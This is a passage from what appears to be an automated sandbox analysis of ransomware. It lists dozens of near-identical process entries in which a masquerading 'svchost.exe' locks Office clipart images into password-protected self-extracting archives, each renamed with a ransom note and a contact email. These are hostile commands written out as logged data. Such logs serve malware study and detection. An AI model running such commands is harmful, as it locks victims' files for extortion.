  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2676
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1540
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2900
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3064
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2880
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2216
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2656
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1152
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1368
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3012
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2148
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1868
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1804
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2156
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2064
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1548
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:900
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2920
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1852
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1072
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2172
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2824
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2804
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2788
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3068
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2088
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2372
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:580
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2536
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2684
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1376
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2676
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1540
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2900
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1440
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2076
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2212
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2552
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2096
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3008
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2808
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:448
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1160
- C:\ProgramData\msvkp\svchost.exe
